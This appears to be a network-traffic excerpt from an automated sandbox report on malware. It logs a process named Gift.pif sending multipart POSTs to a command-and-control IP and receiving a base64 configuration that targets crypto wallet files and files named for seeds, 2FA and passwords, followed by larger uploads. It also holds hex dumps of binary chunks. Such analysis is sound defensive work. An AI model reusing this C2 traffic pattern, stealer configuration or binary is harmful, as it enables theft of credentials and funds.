                                                                        2024-08-05 16:56:16 UTC16384INData Raw: f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51
                                                                        Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQ
                                                                        2024-08-05 16:56:16 UTC16384INData Raw: 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b
                                                                        Data Ascii: Q=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                        2024-08-05 16:56:16 UTC16384INData Raw: 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d
                                                                        Data Ascii: @;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                        2024-08-05 16:56:16 UTC16384INData Raw: 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10
                                                                        Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                        2024-08-05 16:56:17 UTC16384INData Raw: d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00
                                                                        Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                        2024-08-05 16:56:17 UTC16384INData Raw: 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24
                                                                        Data Ascii: 8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$
                                                                        2024-08-05 16:56:17 UTC16384INData Raw: 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff
                                                                        Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                        2024-08-05 16:56:17 UTC16384INData Raw: e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74
                                                                        Data Ascii: `P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rtt
                                                                        2024-08-05 16:56:17 UTC16384INData Raw: 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00
                                                                        Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.549730188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:19 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----DGDBFBFCBFBKECAAKJKF
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 1145
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:19 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------DGDBFBFCBFBKECAAKJKFContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------DGDBFBFCBFBKECAAKJKFContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------DGDBFBFCBFBKECAAKJKFCont
                                                                        2024-08-05 16:56:20 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.549731188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:20 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJE
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 331
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:20 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------HDHCFIJEGCAKJJKEHJJECont
                                                                        2024-08-05 16:56:21 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:21 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:21 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                        Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.549732188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:22 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 331
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:22 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------AAKEGIJEHJDGDHJKJKKJCont
                                                                        2024-08-05 16:56:22 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:22 UTC2208INData Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                        Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.549733188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:23 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----AAFHIIDHJEBFBFIDAKFB
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 7009
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:23 UTC7009OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------AAFHIIDHJEBFBFIDAKFBContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------AAFHIIDHJEBFBFIDAKFBContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------AAFHIIDHJEBFBFIDAKFBCont
                                                                        2024-08-05 16:56:24 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:24 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.549734188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:26 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 6985
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:26 UTC6985OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------CFCFHJDBKJKEBFHJEHIICont
                                                                        2024-08-05 16:56:26 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.549735188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:35 UTC327OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ
